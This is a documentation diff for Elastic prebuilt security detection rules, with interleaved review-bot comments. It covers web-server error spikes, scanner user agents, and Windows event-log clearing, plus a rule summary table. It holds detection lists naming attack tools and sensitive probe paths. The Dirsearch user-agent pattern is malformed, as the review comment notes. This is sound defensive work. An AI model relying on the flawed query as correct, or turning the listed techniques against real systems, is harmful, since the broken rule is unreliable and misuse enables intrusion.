+ + +*Response and remediation* + + +- Immediately rate-limit or block the originating client(s) at the edge (reverse proxy/WAF) using the observed source IPs, User-Agent/TLS fingerprints, and the failing URL patterns generating 5xx bursts. +- Drain the origin upstream(s) showing repeated 500/502/503/504 on the probed routes, roll back the latest deployment or config change for those services, and disable any unstable endpoint or plugin that is crashing under input fuzzing. +- Restart affected application workers and proxies, purge bad cache entries, re-enable traffic gradually with canary percentage, and confirm normal response rates via synthetic checks against the previously failing URLs. +- Escalate to Security Operations and Incident Response if 5xx spikes persist after blocking or if error pages expose stack traces, credentials, or admin route disclosures, or if traffic originates from multiple global hosting ASNs. +- Deploy targeted WAF rules for path traversal and injection markers seen in the URLs, enforce per-IP and per-route rate limits, tighten upstream timeouts/circuit breakers, and replace verbose error pages with generic responses that omit stack details. +- Add bot management and IP reputation blocking at the CDN/edge, lock down unauthenticated access to admin/debug routes, and instrument alerts that trigger on sustained 5xx bursts per client and per route with automatic edge throttling. 
+ + +==== Rule query + + +[source, js] +---------------------------------- +from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*, logs-traefik.access-* +| where + http.request.method == "GET" and + http.response.status_code in ( + 500, // Internal Server Error + 502, // Bad Gateway + 503, // Service Unavailable + 504 // Gateway Timeout + ) + +| eval Esql.url_original_to_lower = to_lower(url.original) + +| keep + @timestamp, + event.dataset, + http.request.method, + http.response.status_code, + source.ip, + agent.id, + agent.name, + Esql.url_original_to_lower, + data_stream.namespace + +| stats + Esql.event_count = count(), + Esql.http_response_status_code_count = count(http.response.status_code), + Esql.http_response_status_code_values = values(http.response.status_code), + Esql.agent_name_values = values(agent.name), + Esql.agent_id_values = values(agent.id), + Esql.http_request_method_values = values(http.request.method), + Esql.http_response_status_code_values = values(http.response.status_code), + Esql.url_path_values = values(Esql.url_original_to_lower), + Esql.event_dataset_values = values(event.dataset), + Esql.data_stream_namespace_values = values(data_stream.namespace) + by source.ip, agent.id +| where + Esql.http_response_status_code_count > 10 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Reconnaissance +** ID: TA0043 +** Reference URL: https://attack.mitre.org/tactics/TA0043/ +* Technique: +** Name: Active Scanning +** ID: T1595 +** Reference URL: https://attack.mitre.org/techniques/T1595/ +* Sub-technique: +** Name: Vulnerability Scanning +** ID: T1595.002 +** Reference URL: https://attack.mitre.org/techniques/T1595/002/ +* Sub-technique: +** Name: Wordlist Scanning +** ID: T1595.003 +** Reference URL: https://attack.mitre.org/techniques/T1595/003/ 
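Review bot: The description promises detection of "unusual spikes", but the query applies a fixed threshold — more than 10 5xx GET responses per `source.ip`/`agent.id` in the ~11-minute window — with no per-route or per-host baseline, so any backend outage turns every client that reloads a page into an alert (up to the 100-alert cap); the page should state this plainly, e.g. `*Threshold*: more than 10 5xx responses from one source IP on one agent per run`. `Esql.http_response_status_code_count = count(http.response.status_code)` is just `Esql.event_count` under another name once the status-code filter has run, and `Esql.http_response_status_code_values` is declared twice inside `stats`; drop the duplicates. To separate scanning from an outage the way the discovery rule does, add `Esql.url_count_distinct = count_distinct(Esql.url_original_to_lower)` to `stats` and require it to be elevated alongside the count, since a user hammering one broken URL and a fuzzer sweeping hundreds of routes currently look identical.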
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-suspicious-user-agent-requests.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-suspicious-user-agent-requests.asciidoc
new file mode 100644
index 0000000000..1154e454c2
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-suspicious-user-agent-requests.asciidoc
@@ -0,0 +1,175 @@
+[[prebuilt-rule-8-19-18-web-server-suspicious-user-agent-requests]]
+=== Web Server Suspicious User Agent Requests
+
+This rule detects unusual spikes in web server requests with uncommon or suspicious user-agent strings. Such activity may indicate reconnaissance attempts by attackers trying to identify vulnerabilities in web applications or servers. These user-agents are often associated with automated tools used for scanning, vulnerability assessment, or brute-force attacks.
+
+*Rule type*: esql
+
+*Rule indices*: None
+
+*Severity*: low
+
+*Risk score*: 21
+
+*Runs every*: 10m
+
+*Searches indices from*: now-11m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*: None
+
+*Tags*:
+
+* Domain: Web
+* Use Case: Threat Detection
+* Tactic: Reconnaissance
+* Tactic: Credential Access
+* Data Source: Nginx
+* Data Source: Apache
+* Data Source: Apache Tomcat
+* Data Source: IIS
+* Data Source: Traefik
+* Resources: Investigation Guide
+
+*Version*: 4
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+ ## Triage and analysis
+
+> **Disclaimer**:
+> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
+
+
+*Investigating Web Server Suspicious User Agent Requests*
+
+
+This rule flags surges of web requests that advertise scanner or brute-force tool user agents, signaling active reconnaissance against your web servers and applications. A common pattern is dirsearch or gobuster sweeping for hidden paths, firing hundreds of rapid GETs across diverse URLs from one host and probing admin panels, backup folders, and robots.txt.
+
+
+*Possible investigation steps*
+
+
+- Verify whether the activity aligns with approved scanners or uptime checks by cross-referencing inventories, allowlists, change windows, and egress ranges; otherwise enrich the originating IP with ASN, geolocation, and threat reputation to gauge risk.
+- Sample representative requests to identify targeted paths and payloads (e.g., admin panels, .git/.env, backups, traversal, SQLi/XSS markers) and note any successful responses or downloads that indicate information exposure.
+- Analyze request rate, methods, and status-code distribution to separate noisy recon from successful discovery or brute-force patterns, highlighting any POST/PUT with nontrivial bodies.
+- Correlate the same client across hosts and security layers (application/auth logs, WAF/CDN, IDS) to determine whether it is scanning multiple services, triggering signatures, or attempting credential stuffing.
+- Assess user-agent authenticity and evasiveness by comparing HTTP header order/values and TLS fingerprints (JA3/JA4) to expected clients, and verify true client identity via forwarded-for headers if behind a proxy or CDN.
+
+
+*False positive analysis*
+
+
+- Legitimate, scheduled vulnerability assessments by internal teams (e.g., Nessus, Nikto, or OpenVAS) can generate large volumes of requests with those user-agent strings across many paths.
+- Developer or QA testing using discovery/fuzzing or intercept-proxy tools (Dirsearch, Gobuster, Ffuf, Burp, or OWASP ZAP) may unintentionally target production hosts, producing a short-lived spike with diverse URLs.
+
+
+*Response and remediation*
+
+
+- Immediately contain by blocking or rate-limiting the originating IPs at the WAF/CDN and edge firewall, and add temporary rules to drop or challenge requests that advertise tool user agents such as "nikto", "sqlmap", "dirsearch", "wpscan", "gobuster", or "burp".
+- If traffic is proxied (CDN/reverse proxy), identify the true client via forwarded headers and extend blocks at both layers, enabling bot management or JS challenges on swept paths like /admin, /.git, /.env, /backup, and common discovery endpoints.
+- Eradicate exposure by removing or restricting access to sensitive files and directories uncovered by the scans, rotating any credentials or API keys found, invalidating active sessions, and disabling public access to administrative panels until hardened.
+- Recover by verifying no unauthorized changes or data exfiltration occurred, tuning per-IP and per-path rate limits to prevent path-sweeps while preserving legitimate traffic, and reintroducing normal rules only after fixes are deployed and stability is confirmed.
+- Escalate to incident response if sensitive files are successfully downloaded (HTTP 200/206 on /.git, /.env, or backups), any login or account creation succeeds, multiple hosts or environments are targeted, or activity persists after blocking via UA spoofing or rapid IP rotation.
+- Harden long term by enforcing WAF signatures for known scanner UAs and path patterns, denying directory listing and direct access to /.git, /.env, /backup and similar artifacts, requiring MFA/VPN for /admin and management APIs, and deploying auto-ban controls like fail2ban or mod_security.
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*, logs-traefik.access-*
+
+| eval Esql.user_agent_original_to_lower = to_lower(user_agent.original), Esql.url_original_to_lower = to_lower(url.original)
+
+| where
+ Esql.user_agent_original_to_lower like "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/74.0.3729.169 safari/537.36" or // Nikto
+ Esql.user_agent_original_to_lower like "nikto*" or // Nikto
+ Esql.user_agent_original_to_lower like "mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)" or // Nessus Vulnerability Scanner
+ Esql.user_agent_original_to_lower like "*nessus*" or // Nessus Vulnerability Scanner
+ Esql.user_agent_original_to_lower like "sqlmap/*" or // SQLMap
+ Esql.user_agent_original_to_lower like "wpscan*" or // WPScan
+ Esql.user_agent_original_to_lower like "feroxbuster/*" or // Feroxbuster
+ Esql.user_agent_original_to_lower like "masscan*" or // Masscan & masscan-ng
+ Esql.user_agent_original_to_lower like "fuzz*" or // Ffuf
+ Esql.user_agent_original_to_lower like "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/user_agent.original like~ 87.0.4280.88 safari/537.36" or // Dirsearch
+ Esql.user_agent_original_to_lower like "mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)" or // Dirb
+ Esql.user_agent_original_to_lower like "dirbuster*" or // Dirbuster
+ Esql.user_agent_original_to_lower like "gobuster/*" or // Gobuster
+ Esql.user_agent_original_to_lower like "*dirsearch*" or // dirsearch
+ Esql.user_agent_original_to_lower like "*nmap*" or // Nmap Scripting Engine
+ Esql.user_agent_original_to_lower like "*hydra*" or // Hydra Brute Forcer
+ Esql.user_agent_original_to_lower like "*w3af*" or // w3af Web Application Attack and Audit Framework
+ Esql.user_agent_original_to_lower like "*arachni*" or // Arachni Web Application Security Scanner
+ Esql.user_agent_original_to_lower like "*skipfish*" or // Skipfish Web Application Security Scanner
+ Esql.user_agent_original_to_lower like "*openvas*" or // OpenVAS Vulnerability Scanner
+ Esql.user_agent_original_to_lower like "*acunetix*" or // Acunetix Vulnerability Scanner
+ Esql.user_agent_original_to_lower like "*zap*" or // OWASP ZAP
+ Esql.user_agent_original_to_lower like "*burp*" // Burp Suite
+
+| keep
+ @timestamp,
+ event.dataset,
+ user_agent.original,
+ source.ip,
+ agent.id,
+ agent.name,
+ Esql.url_original_to_lower,
+ Esql.user_agent_original_to_lower,
+ data_stream.namespace
+| stats
+ Esql.event_count = count(),
+ Esql.url_original_count_distinct = count_distinct(Esql.url_original_to_lower),
+ Esql.agent_name_values = values(agent.name),
+ Esql.agent_id_values = values(agent.id),
+ Esql.url_original_values = values(Esql.url_original_to_lower),
+ Esql.user_agent_original_values = values(Esql.user_agent_original_to_lower),
+ Esql.event_dataset_values = values(event.dataset),
+ Esql.data_stream_namespace_values = values(data_stream.namespace)
+ by source.ip, agent.id
+| where
+ Esql.event_count > 50 and Esql.url_original_count_distinct > 10
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Reconnaissance
+** ID: TA0043
+** Reference URL: https://attack.mitre.org/tactics/TA0043/
+* Technique:
+** Name: Active Scanning
+** ID: T1595
+** Reference URL: https://attack.mitre.org/techniques/T1595/
+* Sub-technique:
+** Name: Scanning IP Blocks
+** ID: T1595.001
+** Reference URL: https://attack.mitre.org/techniques/T1595/001/
+* Sub-technique:
+** Name: Vulnerability Scanning
+** ID: T1595.002
+** Reference URL: https://attack.mitre.org/techniques/T1595/002/
+* Sub-technique:
+** Name: Wordlist Scanning
+** ID: T1595.003
+** Reference URL: https://attack.mitre.org/techniques/T1595/003/
+* Tactic:
+** Name: Credential Access
+** ID: TA0006
+** Reference URL: https://attack.mitre.org/tactics/TA0006/
+* Technique:
+** Name: Brute Force
+** ID: T1110
+** Reference URL: https://attack.mitre.org/techniques/T1110/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-windows-event-logs-cleared.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-windows-event-logs-cleared.asciidoc
new file mode 100644
index 0000000000..49105da920
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-windows-event-logs-cleared.asciidoc
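Review bot: The Dirsearch branch of the `where` clause in the rule query is malformed: the pattern `"... chrome/user_agent.original like~ 87.0.4280.88 safari/537.36"` has what looks like a stray `user_agent.original like~` fragment pasted into the literal, so no real user-agent string can ever match it and that condition is dead (the `"*dirsearch*"` branch further down is the only Dirsearch coverage left). Presumably the intended literal was `"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/87.0.4280.88 safari/537.36"`; since this page is generated from the rule source, the correction belongs upstream in the rule definition, with the doc regenerated. Separately, the first Nikto pattern and the Dirb pattern are exact matches on ordinary Chrome 74 / MSIE 6 browser strings rather than on a tool name, so they may also fire on legitimate legacy clients; a short comment in the query noting that these two patterns match default tool UAs that are indistinguishable from real browsers would help tuners understand the expected false-positive source.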
@@ -0,0 +1,115 @@
+[[prebuilt-rule-8-19-18-windows-event-logs-cleared]]
+=== Windows Event Logs Cleared
+
+Identifies attempts to clear Windows event log stores. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system.
+
+*Rule type*: query
+
+*Rule indices*:
+
+* winlogbeat-*
+* logs-system.security*
+* logs-system.system*
+* logs-windows.forwarded*
+
+*Severity*: low
+
+*Risk score*: 21
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*: None
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Windows
+* Use Case: Threat Detection
+* Tactic: Defense Evasion
+* Resources: Investigation Guide
+* Data Source: Windows Security Event Logs
+* Data Source: Windows System Event Logs
+
+*Version*: 216
+
+*Rule authors*:
+
+* Elastic
+* Anabella Cristaldi
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Windows Event Logs Cleared*
+
+
+Windows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries can tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.
+
+This rule looks for the occurrence of clear actions on the `security` event log.
+
+
+*Possible investigation steps*
+
+
+- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.
+- Identify the user account that performed the action and whether it should perform this kind of action.
+- Contact the account owner and confirm whether they are aware of this activity.
+- Investigate other alerts associated with the user/host during the past 48 hours.
+ - Verify if any other anti-forensics behaviors were observed.
+- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.
+
+
+*False positive analysis*
+
+
+- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.
+
+
+*Response and remediation*
+
+
+- Initiate the incident response process based on the outcome of the triage.
+ - This activity is potentially done after the adversary achieves its objectives on the host. Ensure that previous actions, if any, are investigated accordingly with their response playbooks.
+- Isolate the involved host to prevent further post-compromise behavior.
+- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.
+- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.
+- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.
+- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+host.os.type:windows and event.action:("audit-log-cleared" or "Log clear") and
+ winlog.channel: ("Security" or "System")
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Defense Evasion
+** ID: TA0005
+** Reference URL: https://attack.mitre.org/tactics/TA0005/
+* Technique:
+** Name: Indicator Removal
+** ID: T1070
+** Reference URL: https://attack.mitre.org/techniques/T1070/
+* Sub-technique:
+** Name: Clear Windows Event Logs
+** ID: T1070.001
+** Reference URL: https://attack.mitre.org/techniques/T1070/001/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rules-8-19-18-appendix.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rules-8-19-18-appendix.asciidoc
new file mode 100644
index 0000000000..b6a4f8ceef
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rules-8-19-18-appendix.asciidoc
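Review bot: The investigation guide's sentence "This rule looks for the occurrence of clear actions on the `security` event log." no longer matches the query, which filters on `winlog.channel: ("Security" or "System")` and lists both Windows Security and System event logs as data sources. Analysts reading the guide would expect only Security-log clears and may discard alerts for the System channel as noise. Suggested wording: "This rule looks for the occurrence of clear actions on the `Security` and `System` event logs." The page is generated from the rule source, so the text should be corrected there and the doc regenerated.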
@@ -0,0 +1,75 @@
+["appendix",role="exclude",id="prebuilt-rule-8-19-18-prebuilt-rules-8-19-18-appendix"]
+= Downloadable rule update v8.19.18
+
+This section lists all updates associated with version 8.19.18 of the Fleet integration *Prebuilt Security Detection Rules*.
+
+
+include::prebuilt-rule-8-19-18-aws-cloudshell-environment-created.asciidoc[]
+include::prebuilt-rule-8-19-18-aws-api-activity-from-uncommon-s3-client-by-rare-user.asciidoc[]
+include::prebuilt-rule-8-19-18-azure-service-principal-sign-in-followed-by-arc-cluster-credential-access.asciidoc[]
+include::prebuilt-rule-8-19-18-azure-arc-cluster-credential-access-by-identity-from-unusual-source.asciidoc[]
+include::prebuilt-rule-8-19-18-azure-service-principal-authentication-from-multiple-countries.asciidoc[]
+include::prebuilt-rule-8-19-18-kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc[]
+include::prebuilt-rule-8-19-18-m365-sharepoint-site-sharing-policy-weakened.asciidoc[]
+include::prebuilt-rule-8-19-18-m365-sharepoint-site-administrator-added.asciidoc[]
+include::prebuilt-rule-8-19-18-suspicious-write-attempt-to-apparmor-policy-management-files.asciidoc[]
+include::prebuilt-rule-8-19-18-apparmor-policy-interface-access.asciidoc[]
+include::prebuilt-rule-8-19-18-apparmor-policy-violation-detected.asciidoc[]
+include::prebuilt-rule-8-19-18-apparmor-profile-compilation-via-apparmor-parser.asciidoc[]
+include::prebuilt-rule-8-19-18-potential-database-dumping-activity.asciidoc[]
+include::prebuilt-rule-8-19-18-potential-snap-confine-privilege-escalation-via-cve-2026-3888.asciidoc[]
+include::prebuilt-rule-8-19-18-first-time-python-accessed-sensitive-credential-files.asciidoc[]
+include::prebuilt-rule-8-19-18-first-time-python-spawned-a-shell-on-host.asciidoc[]
+include::prebuilt-rule-8-19-18-first-time-python-created-a-launchagent-or-launchdaemon.asciidoc[]
+include::prebuilt-rule-8-19-18-ibm-qradar-external-alerts.asciidoc[]
+include::prebuilt-rule-8-19-18-multiple-remote-management-tool-vendors-on-same-host.asciidoc[]
+include::prebuilt-rule-8-19-18-remote-management-access-launch-after-msi-install.asciidoc[]
+include::prebuilt-rule-8-19-18-potential-protocol-tunneling-via-cloudflared.asciidoc[]
+include::prebuilt-rule-8-19-18-potential-protocol-tunneling-via-yuze.asciidoc[]
+include::prebuilt-rule-8-19-18-suspicious-shell-execution-via-velociraptor.asciidoc[]
+include::prebuilt-rule-8-19-18-suspicious-javascript-execution-via-deno.asciidoc[]
+include::prebuilt-rule-8-19-18-potential-data-exfiltration-via-rclone.asciidoc[]
+include::prebuilt-rule-8-19-18-genai-process-connection-to-unusual-domain.asciidoc[]
+include::prebuilt-rule-8-19-18-genai-process-accessing-sensitive-files.asciidoc[]
+include::prebuilt-rule-8-19-18-elastic-agent-service-terminated.asciidoc[]
+include::prebuilt-rule-8-19-18-rot-encoded-python-script-execution.asciidoc[]
+include::prebuilt-rule-8-19-18-unusual-process-modifying-genai-configuration-file.asciidoc[]
+include::prebuilt-rule-8-19-18-elastic-defend-alert-followed-by-telemetry-loss.asciidoc[]
+include::prebuilt-rule-8-19-18-potential-http-downgrade-attack.asciidoc[]
+include::prebuilt-rule-8-19-18-execution-via-openclaw-agent.asciidoc[]
+include::prebuilt-rule-8-19-18-detection-alert-on-a-process-exhibiting-cpu-spike.asciidoc[]
+include::prebuilt-rule-8-19-18-fortigate-ssl-vpn-login-followed-by-siem-alert-by-user.asciidoc[]
+include::prebuilt-rule-8-19-18-web-server-potential-command-injection-request.asciidoc[]
+include::prebuilt-rule-8-19-18-web-server-discovery-or-fuzzing-activity.asciidoc[]
+include::prebuilt-rule-8-19-18-web-server-potential-spike-in-error-response-codes.asciidoc[]
+include::prebuilt-rule-8-19-18-web-server-suspicious-user-agent-requests.asciidoc[]
+include::prebuilt-rule-8-19-18-microsoft-graph-request-email-access-by-unusual-user-and-client.asciidoc[]
+include::prebuilt-rule-8-19-18-entra-id-oauth-device-code-grant-by-unusual-user.asciidoc[]
+include::prebuilt-rule-8-19-18-microsoft-graph-request-user-impersonation-by-unusual-client.asciidoc[]
+include::prebuilt-rule-8-19-18-m365-exchange-inbox-forwarding-rule-created.asciidoc[]
+include::prebuilt-rule-8-19-18-potential-data-exfiltration-through-curl.asciidoc[]
+include::prebuilt-rule-8-19-18-potential-data-exfiltration-through-wget.asciidoc[]
+include::prebuilt-rule-8-19-18-dynamic-linker-copy.asciidoc[]
+include::prebuilt-rule-8-19-18-kernel-module-load-from-unusual-location.asciidoc[]
+include::prebuilt-rule-8-19-18-connection-to-commonly-abused-web-services.asciidoc[]
+include::prebuilt-rule-8-19-18-first-time-seen-dns-query-to-rmm-domain.asciidoc[]
+include::prebuilt-rule-8-19-18-ingress-transfer-via-windows-bits.asciidoc[]
+include::prebuilt-rule-8-19-18-first-time-seen-remote-monitoring-and-management-tool.asciidoc[]
+include::prebuilt-rule-8-19-18-remote-file-download-via-powershell.asciidoc[]
+include::prebuilt-rule-8-19-18-remote-file-download-via-script-interpreter.asciidoc[]
+include::prebuilt-rule-8-19-18-remote-file-copy-via-teamviewer.asciidoc[]
+include::prebuilt-rule-8-19-18-attempt-to-establish-vscode-remote-tunnel.asciidoc[]
+include::prebuilt-rule-8-19-18-privileged-accounts-brute-force.asciidoc[]
+include::prebuilt-rule-8-19-18-multiple-logon-failure-from-the-same-source-address.asciidoc[]
+include::prebuilt-rule-8-19-18-windows-event-logs-cleared.asciidoc[]
+include::prebuilt-rule-8-19-18-potential-remote-install-via-msiexec.asciidoc[]
+include::prebuilt-rule-8-19-18-local-account-tokenfilter-policy-disabled.asciidoc[]
+include::prebuilt-rule-8-19-18-suspicious-process-access-via-direct-system-call.asciidoc[]
+include::prebuilt-rule-8-19-18-unusual-file-creation-alternate-data-stream.asciidoc[]
+include::prebuilt-rule-8-19-18-potential-notepad-markdown-rce-exploitation.asciidoc[]
+include::prebuilt-rule-8-19-18-potential-lateral-tool-transfer-via-smb-share.asciidoc[]
+include::prebuilt-rule-8-19-18-remote-execution-via-file-shares.asciidoc[]
+include::prebuilt-rule-8-19-18-persistent-scripts-in-the-startup-directory.asciidoc[]
+include::prebuilt-rule-8-19-18-component-object-model-hijacking.asciidoc[]
+include::prebuilt-rule-8-19-18-potential-account-takeover-mixed-logon-types.asciidoc[]
+include::prebuilt-rule-8-19-18-potential-account-takeover-logon-from-new-source-ip.asciidoc[]
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rules-8-19-18-summary.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rules-8-19-18-summary.asciidoc
new file mode 100644
index 0000000000..f7b14d8584
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rules-8-19-18-summary.asciidoc
@@ -0,0 +1,150 @@ +[[prebuilt-rule-8-19-18-prebuilt-rules-8-19-18-summary]] +[role="xpack"] +== Update v8.19.18 + +This section lists all updates associated with version 8.19.18 of the Fleet integration *Prebuilt Security Detection Rules*. + + +[width="100%",options="header"] +|============================================== +|Rule |Description |Status |Version + +|<> | Identifies the creation of a new AWS CloudShell environment. CloudShell is a browser-based shell that provides command-line access to AWS resources directly from the AWS Management Console. The CreateEnvironment API is called when a user launches CloudShell for the first time or when accessing CloudShell in a new AWS region. Adversaries with console access may use CloudShell to execute commands, install tools, or interact with AWS services without needing local CLI credentials. Monitoring environment creation helps detect unauthorized CloudShell usage from compromised console sessions. | new | 1 + +|<> | Identifies AWS API activity originating from uncommon desktop client applications based on the user agent string. This rule detects S3 Browser and Cyberduck, which are graphical S3 management tools that provide bulk upload/download capabilities. While legitimate, these tools are rarely used in enterprise environments and have been observed in use by threat actors for data exfiltration. Any activity from these clients should be validated against authorized data transfer workflows. | new | 1 + +|<> | Detects when a service principal authenticates to Microsoft Entra ID and then lists credentials for an Azure Arc-connected Kubernetes cluster within a short time window. The `listClusterUserCredential` action retrieves tokens that enable kubectl access through the Arc Cluster Connect proxy. 
This sequence (service principal sign-in followed by Arc credential retrieval), represents the exact attack chain used by adversaries with stolen service principal secrets to establish a proxy tunnel into Kubernetes clusters. Service principals that authenticate externally (as opposed to managed identities) and immediately access Arc cluster credentials warrant investigation, particularly when the sign-in originates from an unexpected location or ASN. | new | 1 + +|<> | Detects when a service principal or user performs an Azure Arc cluster credential listing operation from a source IP not previously associated with that identity. The `listClusterUserCredential` action retrieves credentials for the Arc Cluster Connect proxy, enabling kubectl access through the Azure ARM API. An adversary using stolen service principal credentials will typically call this operation from infrastructure not previously seen for that SP. By tracking the combination of caller identity and source IP, this rule avoids false positives from backend services and CI/CD pipelines that rotate IPs but maintain consistent identity-to-IP patterns over time. | new | 1 + +|<> | Detects when an Azure service principal authenticates from multiple countries within a short time window, which may indicate stolen credentials being used from different geographic locations. Service principals typically authenticate from consistent locations tied to their deployment infrastructure. Authentication from multiple countries in a brief period suggests credential compromise, particularly when the source countries do not align with the organization's expected operating regions. This pattern has been observed in attacks using stolen CI/CD credentials, phished service principal secrets, and compromised automation accounts. | new | 1 + +|<> | Detects when secrets or configmaps are accessed, created, modified, or deleted in a Kubernetes cluster by the Azure Arc AAD proxy service account. 
When operations are routed through the Azure Arc Cluster Connect proxy, the Kubernetes audit log records the acting user as `system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa` with the actual caller identity in the `impersonatedUser` field. This pattern indicates that someone is accessing the cluster through the Azure ARM API rather than directly via kubectl against the API server. While legitimate for Arc-managed workflows, adversaries with stolen service principal credentials can abuse Arc Cluster Connect to read, exfiltrate, or modify secrets and configmaps while appearing as the Arc proxy service account in K8s audit logs. | new | 1 + +|<> | Identifies when a SharePoint or OneDrive site sharing policy is changed to weaken security controls. The SharingPolicyChanged event fires for many routine policy modifications, but this rule targets specific high-risk transitions where sharing restrictions are relaxed. This includes enabling guest sharing, enabling anonymous link sharing, making a site public, or enabling guest user access. Adversaries who compromise administrative accounts may weaken sharing policies to exfiltrate data to external accounts or create persistent external access paths. | new | 1 + +|<> | Identifies when a new SharePoint Site Administrator is added in Microsoft 365. Site Administrators have full control over SharePoint Sites, including the ability to manage permissions, access all content, and modify site settings. Adversaries who compromise a privileged account may add themselves or a controlled account as a Site Administrator to maintain persistent, high-privilege access to sensitive SharePoint data. This technique was notably observed in the 0mega ransomware campaign, where attackers elevated privileges to exfiltrate data and deploy ransom notes across SharePoint sites. | new | 1 + +|<> | Detects processes attempting to write to AppArmor policy management pseudo-files located under "/sys/kernel/security/apparmor/". 
These special kernel interfaces are used to load, replace, or remove AppArmor profiles (".load", ".replace", ".remove"). In normal environments, AppArmor policy management is typically performed by administrative tools such as "apparmor_parser" during system initialization or package installation. Direct interaction with these pseudo-files from shell utilities, interpreters, or scripting environments is uncommon and may indicate attempts to modify security policy at runtime. Adversaries may abuse these interfaces to weaken or disable AppArmor protections, introduce malicious profiles, or exploit vulnerabilities in the AppArmor policy parser as part of local privilege escalation chains. | new | 1 + +|<> | Identifies access to AppArmor kernel policy control interfaces through the .load, .replace, or .remove files under /sys/kernel/security/apparmor/. These special files are used to load, modify, or remove AppArmor profiles and are rarely accessed during normal system activity outside of policy administration. Reads or writes to these interfaces may indicate legitimate security configuration changes, but can also reflect defense evasion, unauthorized policy tampering, or the installation of attacker-controlled profiles. This detection is especially valuable on systems where AppArmor policy changes are uncommon or tightly controlled. | new | 1 + +|<> | Identifies events where the AppArmor security module blocked or restricted an operation due to a policy violation. AppArmor enforces mandatory access control policies that limit how processes interact with system resources such as files, network sockets, and capabilities. When a process attempts an action that is not permitted by the active profile, the kernel generates a policy violation event. While these events can occur during normal operation or misconfiguration, they may also indicate attempted privilege escalation, restricted file access, or malicious activity being prevented by the system's security policy. 
| new | 1 + +|<> | Detects the execution of "apparmor_parser" using the "-o" option to write a compiled AppArmor profile to an output file. This functionality is normally used by system administration tools or package installation scripts when building or loading AppArmor policies. In adversarial scenarios, attackers may use "apparmor_parser" to compile custom AppArmor profiles that can later be loaded into the kernel through AppArmor policy management interfaces. Malicious profiles may weaken security controls, alter the behavior of privileged programs, or assist in exploitation chains involving AppArmor policy manipulation. | new | 1 + +|<> | This rule detects the use of database dumping utilities to exfiltrate data from a database. Attackers may attempt to dump the database to a file on the system and then exfiltrate the file to a remote server. | new | 1 + +|<> | This rule detects non-root file creation within "/tmp/.snap" or its host backing path "/tmp/snap-private-tmp/*/tmp/.snap", which may indicate exploitation attempts related to CVE-2026-3888. In vulnerable Ubuntu systems, the snap-confine utility normally creates the "/tmp/.snap" directory as root when initializing a snap sandbox. The vulnerability arises when systemd-tmpfiles deletes this directory after it becomes stale, allowing an unprivileged user to recreate it and populate attacker-controlled files. During subsequent snap sandbox initialization, snap-confine may bind-mount or trust these attacker-controlled paths, enabling manipulation of libraries or configuration files that can lead to local privilege escalation to root. Because legitimate creation of ".snap" directories should only be performed by root, non-root file activity in these locations is highly suspicious. This detection helps identify early stages of the exploit before privilege escalation is completed. | new | 1 + +|<> | Detects the first time a Python process accesses sensitive credential 